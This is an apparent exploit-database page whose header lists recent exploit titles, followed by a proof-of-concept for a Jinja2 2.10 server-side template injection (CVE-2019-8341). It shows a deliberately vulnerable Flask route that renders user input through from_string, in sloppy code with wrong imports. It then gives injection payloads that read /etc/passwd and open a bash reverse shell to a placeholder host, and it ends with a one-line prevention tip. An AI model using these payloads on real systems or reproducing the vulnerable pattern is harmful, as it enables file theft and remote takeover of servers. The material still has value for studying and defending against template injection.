
9 changes to exploits/shellcodes ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS) ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC) AirMore 1.6.1 - Denial of Service (PoC) Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC) Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC) VSCO 1.1.1.0 - Denial of Service (PoC) Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference Webiness Inventory 2.3 - SQL Injection Webiness Inventory 2.3 - 'order' SQL Injection MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery Jinja2 2.10 - 'from_string' Server Side Template Injection qdPM 9.1 - 'search_by_extrafields[]' SQL Injection UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload
50 lines
No EOL
1.3 KiB
Python
Executable file
50 lines
No EOL
1.3 KiB
Python
Executable file
'''
|
|
# Exploit Title: Jinja2 Command injection from_string function
|
|
# Date: [date]
|
|
# Exploit Author: JameelNabbo
|
|
# Website: Ordina.nl
|
|
# Vendor Homepage: http://jinja.pocoo.org
|
|
# Software Link: https://pypi.org/project/Jinja2/#files
|
|
# Version: 2.10
|
|
# Tested on: Kali Linux
|
|
# CVE-2019-8341
|
|
|
|
|
|
// from_string function is prone to SSTI where it takes the "source" parameter as a template object and render it and then return it.
|
|
|
|
|
|
//here's an example about the vulnerable code that uses from_string function in order to handle a variable in GET called 'username' and returns Hello {username}:
|
|
'''
|
|
|
|
import Flask
|
|
import request
|
|
import Jinja2
|
|
|
|
|
|
@app.route("/")
|
|
def index():
|
|
username = request.values.get('username')
|
|
return Jinja2.from_string('Hello ' + username).render()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
app.run(host='127.0.0.1' , port=4444)
|
|
|
|
'''
|
|
POC
|
|
//Exploiting the username param
|
|
http://localhost:4444/?username={{4*4}}
|
|
OUTPUT: Hello 16
|
|
|
|
Reading the /etc/passwd
|
|
|
|
http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
|
|
|
|
|
|
Getting a reverse shell
|
|
http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}
|
|
|
|
|
|
How to prevent it:
|
|
Never let the user provide template content.
|
|
''' |